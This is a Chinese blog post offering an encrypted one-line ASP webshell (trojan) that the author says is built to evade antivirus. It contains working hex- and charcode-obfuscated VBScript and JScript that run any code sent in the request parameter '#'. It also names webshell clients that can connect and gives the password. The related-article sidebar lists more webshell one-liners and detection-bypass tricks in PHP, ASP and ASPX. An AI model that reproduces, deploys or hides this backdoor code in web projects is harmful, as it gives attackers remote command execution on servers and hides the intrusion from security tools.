一句话asp木马加密版 彻底突破杀毒软件

最新推荐文章于 2023-03-31 16:38:14 发布
最新推荐文章于 2023-03-31 16:38:14 发布
阅读量572 收藏
点赞数
分类专栏: T00ls 文章标签: 加密 杀毒软件 asp server function 解密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6596735
版权

<script language=vbs runat=server>
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
HextoStr="EXECUTE """""
C="&CHR(&H"
N=")"
Do While Len(data)>1
If IsNumeric(Left(data,1)) Then
HextoStr=HextoStr&C&Left(data,2)&N
data=Mid(data,3)
Else
HextoStr=HextoStr&C&Left(data,4)&N
data=Mid(data,5)
End If
Loop
End Function
</script>
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode(
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>  


不过加密后就不是一句话了。这个s端用海阳或冰狐都可以连得上的,密码是#。

其实只是换写了<script language=vbs runat=server> 这种方式,里边的代码可以用js或vbs等多种加密方式来加密解密了,省得asp只有微软的那个东东可以加密,同时省去了asp里的%号而已。当然不加密也可以,调用<script language=vbs runat=server>那还是一句话,加密主要是为了躲过杀毒软件。
7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB渗透学习笔记7——webshell及上传绕过
林林木林林L的博客
08-01 3272
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web服
一句话 asp木马加密 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed]  Execute(HextoStr(“65786563757465287265717565737428636872283335292929”))  Function HextoStr(data)  HextoStr=”EXECUTE “””””  C=”&CHR(&H”  N=”)”  Do While Len(data)>1  If IsNumeric(Left(data,1)) Then  HextoStr=HextoStr&C&Left(data,2)&N  data=Mid
学习渗透第一节:msf攻击永恒之蓝+生成一句话木马+绕过杀毒软件
最新发布
m0_66963559的博客
03-31 1511
1.search 漏洞名称或者代号,永恒之蓝的是ms17_010(win10和win11无这个漏洞),exploit攻击利用脚本是进行漏洞攻击,auxiliary辅助是检测漏洞是否存在。5.用set RHOSTS 目标机ip地址,把win8设置为目标机。4.关闭目标机win8的防火墙,ping通kali。渗透之路暂时终止,等我找到能用的win7镜像再继续。3.查看当前模块的设置,show options。2.use 模块前面的数字或者全称。
一句话木马的免杀(转)
weixin_30555515的博客
12-14 355
在入侵过程中,我们常常会遇到这样的问题,因为大马太大,而不能上传,怎么办,这个时候就只能用小马来辅助,但是,小马的语句又被杀,今天我们来说说一句话小马的免杀方法。 众所周之,一句话的语句是<%execute request("密码")%> 1.入侵过程中<%,%>符号被过滤怎么办?我们可以想办法避开<%,%> <scriptlangu...
各类一句话木马免杀集合
joke_ljh的博客
10-10 2313
各类一句话木马免杀集合,基本过D盾与安全狗,php、aspaspx、jsp一句话和冰蝎,我写的文章链接如下: https://www.cnblogs.com/joke-ljh/p/13794125.html
asp-Webshell免杀
weixin_44110913的博客
08-23 3320
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。 本篇文章主要梳理ASP一句话Webshell的构建和规避检测软件达到源文件免杀的思路。最终构建能够同时绕过以下表格中8个专业木马查杀工具和平台检测的Webshell,构造出零提示、无警告、无法被检测到的ASP一句话木马后门。 编号 名称 参考链接 1 网站安全狗(.
一句话木马 php asp,一句话木马源代码
weixin_33454551的博客
04-06 1007
@eval($_POST[123456]);?>*post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码2、防爆破一句话:substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['password']);?>3、过狗一句话:($_=@$_GET[s]).@$_($_POST[hihack])?>4、404隐藏...
一句话木马、中国菜刀、图片一句话制作、过狗一句话
weixin_44722125的博客
04-18 2万+
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
过d盾asp webshell+冰蝎免杀马探讨
goddemon
07-19 2333
正文asp免杀的手法其实也蛮多的个人理解其实免杀核心就是混淆+改变执行顺序啥的。对于asp而言,前者的利用特征这些进行绕后者就是利用函数数组+类的手法个人后者的手法用的最多一样吧这里先扔2个bypass的小马。...
一句话木马的原理及利用分析(asp,aspx,php,jsp)
xysoul的专栏
03-20 5773
一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过
拿下webshell之后小朋友们应该怎么做
王意林的专栏
07-29 8524
脱裤 Mysql Access Mssql PostgreSQL Oracle 提权 维持访问
asp中文编码和php编码的区别,ASP 汉字实业编码反转换
weixin_28745821的博客
03-12 94
ASP 汉字实体编码反转换ASP中有没类似PHP里html_entity_decode的方法,可以将中国这种实体编码的转成汉字“中国”?或者有没有人可以提供一个自己实现的方法?------解决思路----------------------FunctionHTMLDecode(sText)DimIsText=Replace(sText,"&",Chr(38))sText=...
ASP一句话木马(转)
hackerie的博客
10-24 1589
转自:http://blog.csdn.net/eldn__/article/details/8452269
一句话木马变种免杀
qq_42133828的博客
12-31 3227
常见的免杀方式:     字符串拼接     多方式传参免杀     回调函数     远程木马     伪协议后门     函数特性 字符串拼接免杀:     &lt;?php         $str = "abcdefs";         $s = substr($str,-1,1);         $ev = 'a' . $s . 'sert';         $...
asp 一句话小马_一句话木马ASP
weixin_39762441的博客
12-29 774
ASP一句话木马收集:""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>"" then ExecuteGlobal request("c") end if%>< %'eval(request("c"))execute request("#")U...
一句话木马
weixin_47836220的博客
12-11 2397
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 常见的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%> 【基本原理】利用文件上传漏洞,往目标网
一句话木马及免杀
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。 文章目录一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
免杀ASP一句话
weixin_34148340的博客
11-26 994
<% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function UnEncode(cc) for i = 1 to len(cc) if mid(cc,i,1)<>"日" then temp = Mid(cc, i, 1) + temp ...
ASP一句话木马大全
热门推荐
eldn__的专栏
12-30 2万+
"" Then Execute(Request("MH"))%> ""then session("MH")=request("MH"):end if:if session("MH") execute request("MH") 1 asp一句话木马 一句话木马 服务器端 带验证: ——————————————cmd.asp———————————————— <%
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值